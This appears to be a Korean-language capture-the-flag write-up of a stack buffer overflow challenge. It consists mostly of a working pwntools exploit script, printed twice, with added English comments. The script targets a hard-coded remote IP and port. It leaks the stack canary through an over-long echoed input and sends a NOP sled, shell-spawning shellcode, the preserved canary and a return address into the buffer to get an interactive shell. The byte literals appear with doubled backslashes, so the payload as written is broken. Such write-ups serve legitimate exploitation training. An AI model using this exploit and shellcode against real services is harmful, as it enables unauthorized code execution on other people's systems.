

버퍼 주소, RBP, Canary 주소까지 모두 알려준다.

이후 입력 부분이 buffer에 들어가는 걸 확인할 수 있다.

위 정보들을 활용하여 아래와 같이 코드를 작성한다.

# Prelude of the exploit script: connect to the training service and parse
# the three stack addresses it prints in its banner. The same prelude appears
# again in the complete script further down the page.
# NOTE(review): byte literals on this page show doubled backslashes (`\\x..`);
# this looks like a copy/rendering artifact of the write-up, not the author's
# original source.
from pwn import *

# Remote challenge endpoint (hard-coded by the author).
p = remote("43.200.163.250", 31339)

# Debug logging prints every byte sent and received; amd64 makes p64/u64
# pack and unpack 64-bit little-endian values.
context.log_level = "debug"
context.arch = "amd64"

# Log `name: 0x...` via pwntools' success() and return whatever it returns.
def slog(name, addr): return success("{}: {}".format(name, hex(addr)))

# Sample banner from one run. The addresses differ per run, so they are
# parsed from the live connection below rather than reused from here.
#you can break me in 3min.
#buffer addr: 0x7ffdfba3e010
#rbp: 0x7ffdfba3e0a0
#canary addr: 0x7ffdfba3e098

# Each leaked address is read up to its label; recvline() keeps the trailing
# newline, so [:-1] strips it before the base-16 conversion. The target
# handing out its own stack addresses is what removes stack ASLR as an
# obstacle for the rest of the script.
p.recvuntil("buffer addr: ")
buffer_addr = int(p.recvline()[:-1], 16)

p.recvuntil("rbp: ")
rbp_addr = int(p.recvline()[:-1], 16)

p.recvuntil("canary addr: ")
canary_addr = int(p.recvline()[:-1], 16)

# Wait for the service's input prompt before the first send.
p.recvuntil("input: ")
# Author-supplied amd64 machine code; "/bin//sh" is visible in the bytes, so
# this appears to be a standard shell-spawning stub (confirm by disassembling).
shellcode =b"\\x48\\x31\\xf6\\x56\\x48\\xbf\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x57\\x54\\x5f\\x6a\\x3b\\x58\\x99\\x0f\\x05"

Canary_Address, Buffer_Address, RBP_Address

입력을 받아 해당 주소를 받는다.

위 정보들을 종합하여 Nop-Sled 공격기법을 활용하여 RIP 주소를 조작하면 된다.

# Complete exploit script for the training service below.
# Flow: (1) parse the three stack addresses the service prints in its banner,
# (2) leak the stack canary by over-filling the buffer and reading the echo,
# (3) send a payload that keeps the canary intact and returns into a NOP sled
# at the start of the buffer.
# Every step depends on a weakness the challenge provides on purpose: the
# target prints its own stack addresses (no effective stack ASLR), echoes an
# over-long input back (canary disclosure), and — inferred from the payload,
# not visible here — runs code from the stack (NX disabled).
# NOTE(review): byte literals on this page show doubled backslashes (`\\x..`);
# this looks like a copy/rendering artifact of the write-up, not the author's
# original source.
from pwn import *

# Remote challenge endpoint (hard-coded by the author).
p = remote("43.200.163.250", 31339)

# Debug logging prints every byte sent and received; amd64 makes p64/u64
# pack and unpack 64-bit little-endian values.
context.log_level = "debug"
context.arch = "amd64"

# Log `name: 0x...` via pwntools' success() and return whatever it returns
# (callers here ignore the result).
def slog(name, addr): return success("{}: {}".format(name, hex(addr)))

# Sample banner from one run. The addresses differ per run, so they are
# parsed from the live connection below rather than reused from here.
#you can break me in 3min.
#buffer addr: 0x7ffdfba3e010
#rbp: 0x7ffdfba3e0a0
#canary addr: 0x7ffdfba3e098

# Each leaked address is read up to its label; recvline() keeps the trailing
# newline, so [:-1] strips it before the base-16 conversion.
p.recvuntil("buffer addr: ")
buffer_addr = int(p.recvline()[:-1], 16)

p.recvuntil("rbp: ")
rbp_addr = int(p.recvline()[:-1], 16)

p.recvuntil("canary addr: ")
canary_addr = int(p.recvline()[:-1], 16)

# Wait for the service's first input prompt.
p.recvuntil("input: ")
# Author-supplied amd64 machine code; "/bin//sh" is visible in the bytes, so
# this appears to be a standard shell-spawning stub (confirm by disassembling).
shellcode =b"\\x48\\x31\\xf6\\x56\\x48\\xbf\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x57\\x54\\x5f\\x6a\\x3b\\x58\\x99\\x0f\\x05"

# Distance from the buffer start to the leaked rbp value. (The original
# comment said "canary"; the slog label below matches what is computed.)
offset = rbp_addr-buffer_addr
slog("offset : buffer <=> rbp", offset)

# Canary leak.
# With the sample offsets above the canary sits at buffer+0x88, so 0x89 bytes
# of filler overwrite exactly its lowest byte. The script assumes that byte is
# 0x00 (it is put back in front of the 7 leaked bytes below) and relies on the
# service echoing the whole over-long input back. Note the 0x89 is taken from
# the sample run, not derived from canary_addr - buffer_addr.
leak_canary = b'A'*0x89

p.send(leak_canary)
p.recvuntil(leak_canary)          # skip the echoed filler
canary = u64(b'\\x00'+p.recv(7))  # zero low byte + 7 echoed bytes -> full canary

# Diagnostics: leaked addresses.
print()
print("*"*30 + " Address " + "*"*30)
print()

slog("buffer_addr", buffer_addr)
slog("rbp_addr", rbp_addr)
slog("canary_addr", canary_addr)

# Diagnostics: relative distances between the leaked addresses.
print()
print("*"*30 + " Offset " + "*"*30)
print()

slog("rbp <=> buffer", rbp_addr-buffer_addr)
slog("Buffer <=> canary", canary_addr-buffer_addr)
slog("rbp <=> canary", rbp_addr-canary_addr)

# Diagnostics: recovered canary value.
print()
print("*"*30 + " Stack " + "*"*30)
print()

slog("canary", canary)

# The service prompts a second time; the final payload goes into this read.
p.recvuntil("input: ")

# Final payload. Stack layout implied by the sample offsets:
#   buffer[0x88] | canary (8) | saved rbp (8) | return address (8)

# `way` is only printed; the padding length below recomputes the same value.
way = 0x88-len(shellcode)
print(hex(way))

payload = b'\\x90'*(0x88-len(shellcode))  # NOP sled fills the buffer up to the shellcode
payload += shellcode                      # ends exactly at buffer+0x88
payload += p64(canary)                    # leaked canary so the stack-protector check still passes
payload += b'\\x90'*8                     # filler for the saved-rbp slot
payload += p64(buffer_addr)               # return address -> start of the sled in the buffer

p.send(payload)
p.interactive()
